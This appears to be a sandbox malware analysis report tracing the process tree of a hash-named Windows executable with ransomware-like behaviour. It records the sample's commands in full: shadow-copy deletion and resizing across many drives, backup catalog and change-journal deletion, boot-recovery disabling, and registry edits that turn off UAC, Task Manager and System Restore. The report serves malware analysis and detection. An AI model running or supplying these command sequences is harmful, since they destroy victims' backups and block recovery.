1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeBackupPrivilege	3712	vssvc.exe
Token: SeRestorePrivilege	3712	vssvc.exe
Token: SeAuditPrivilege	3712	vssvc.exe
Token: SeBackupPrivilege	4692	wbengine.exe
Token: SeRestorePrivilege	4692	wbengine.exe
Token: SeSecurityPrivilege	4692	wbengine.exe
Token: SeAuditPrivilege	4880	svchost.exe
Token: SeAuditPrivilege	4880	svchost.exe
Token: SeAuditPrivilege	4880	svchost.exe
Token: SeAuditPrivilege	4880	svchost.exe
Token: SeAuditPrivilege	4880	svchost.exe
Token: SeAuditPrivilege	4880	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1796 wrote to memory of 4956	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	82
PID 1796 wrote to memory of 4956	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	82
PID 1796 wrote to memory of 4956	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	82
PID 1796 wrote to memory of 4936	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	83
PID 1796 wrote to memory of 4936	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	83
PID 1796 wrote to memory of 4936	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	83
PID 1796 wrote to memory of 4288	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	84
PID 1796 wrote to memory of 4288	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	84
PID 1796 wrote to memory of 4288	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	84
PID 4288 wrote to memory of 2204	4288	cmd.exe	85
PID 4288 wrote to memory of 2204	4288	cmd.exe	85
PID 4288 wrote to memory of 2204	4288	cmd.exe	85
PID 1796 wrote to memory of 1420	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	87
PID 1796 wrote to memory of 1420	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	87
PID 1796 wrote to memory of 1420	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	87
PID 1796 wrote to memory of 2516	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	88
PID 1796 wrote to memory of 2516	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	88
PID 1796 wrote to memory of 2044	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	89
PID 1796 wrote to memory of 2044	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	89
PID 1796 wrote to memory of 4444	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	92
PID 1796 wrote to memory of 4444	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	92
PID 1796 wrote to memory of 3176	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	98
PID 1796 wrote to memory of 3176	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	98
PID 1796 wrote to memory of 404	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	93
PID 1796 wrote to memory of 404	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	93
PID 1796 wrote to memory of 3756	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	95
PID 1796 wrote to memory of 3756	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	95
PID 1796 wrote to memory of 952	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	100
PID 1796 wrote to memory of 952	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	100
PID 1796 wrote to memory of 208	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	104
PID 1796 wrote to memory of 208	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	104
PID 1796 wrote to memory of 3848	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	102
PID 1796 wrote to memory of 3848	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	102
PID 2516 wrote to memory of 4364	2516	cmd.exe	101
PID 2516 wrote to memory of 4364	2516	cmd.exe	101
PID 1796 wrote to memory of 4776	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	112
PID 1796 wrote to memory of 4776	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	112
PID 2044 wrote to memory of 5032	2044	cmd.exe	106
PID 2044 wrote to memory of 5032	2044	cmd.exe	106
PID 1796 wrote to memory of 2160	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	111
PID 1796 wrote to memory of 2160	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	111
PID 1796 wrote to memory of 3244	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	108
PID 1796 wrote to memory of 3244	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	108
PID 3176 wrote to memory of 4496	3176	cmd.exe	107
PID 3176 wrote to memory of 4496	3176	cmd.exe	107
PID 1796 wrote to memory of 3980	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	114
PID 1796 wrote to memory of 3980	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	114
PID 4444 wrote to memory of 1512	4444	cmd.exe	116
PID 4444 wrote to memory of 1512	4444	cmd.exe	116
PID 1796 wrote to memory of 3452	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	123
PID 1796 wrote to memory of 3452	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	123
PID 1796 wrote to memory of 3964	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	117
PID 1796 wrote to memory of 3964	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	117
PID 1796 wrote to memory of 4724	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	120
PID 1796 wrote to memory of 4724	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	120
PID 1796 wrote to memory of 4424	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	119
PID 1796 wrote to memory of 4424	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	119
PID 1796 wrote to memory of 4392	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	126
PID 1796 wrote to memory of 4392	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	126
PID 404 wrote to memory of 2592	404	cmd.exe	133
PID 404 wrote to memory of 2592	404	cmd.exe	133
PID 3756 wrote to memory of 3616	3756	cmd.exe	132
PID 3756 wrote to memory of 3616	3756	cmd.exe	132
PID 1796 wrote to memory of 1508	1796	5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe	131

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
7028	attrib.exe
7140	attrib.exe

C:\Users\Admin\AppData\Local\Temp\5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
"C:\Users\Admin\AppData\Local\Temp\5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe"
1⤵
- Checks computer location settings
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:1796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
  2⤵
  PID:4956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @echo off
  2⤵
  PID:4936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c chcp 437
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4288
- - C:\Windows\SysWOW64\chcp.com
    chcp 437
    3⤵
    PID:2204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
  2⤵
  PID:1420
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:4364
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:5032
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4444
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:404
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2592
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3756
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3176
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4496
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
  2⤵
  PID:952
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:3852
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  2⤵
  PID:3848
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  2⤵
  PID:208
- - C:\Windows\system32\fsutil.exe
    fsutil.exe usn deletejournal /D C:
    3⤵
    - Deletes NTFS Change Journal
    PID:2788
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
  2⤵
  PID:3244
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1556
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  2⤵
  PID:2160
- - C:\Windows\system32\wbadmin.exe
    wbadmin.exe delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:2412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  2⤵
  PID:4776
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2708
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  2⤵
  PID:3980
- - C:\Windows\system32\schtasks.exe
    schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    3⤵
    PID:4940
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:3964
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:4748
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:4424
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:4956
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
  2⤵
  PID:4724
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
  2⤵
  PID:3452
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3424
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
  2⤵
  PID:4392
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2188
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:2212
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:5028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
  2⤵
  PID:1508
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4164
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
  2⤵
  PID:3584
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1112
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  2⤵
  PID:1904
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:3128
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
  2⤵
  PID:1644
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:4528
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:4400
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:1460
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:3756
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:5008
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:3716
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
  2⤵
  PID:4192
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3772
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
  2⤵
  PID:2900
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4212
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
  2⤵
  PID:1096
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:1440
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:5636
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:1620
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:5848
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
  2⤵
  PID:4592
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4672
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
  2⤵
  PID:2216
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:4264
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:1332
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
  2⤵
  PID:1432
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:260
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:3768
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:1132
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
  2⤵
  PID:2184
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2212
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
  2⤵
  PID:1240
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:896
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:5036
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:3188
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  2⤵
  PID:112
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
    3⤵
    PID:5916
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:4864
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:4860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:3248
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:4588
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
  2⤵
  PID:3560
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5136
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:2904
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:2104
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
  2⤵
  PID:1512
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:3092
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:3568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
  2⤵
  PID:656
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:116
- C:\Windows\System32\cmd.exe
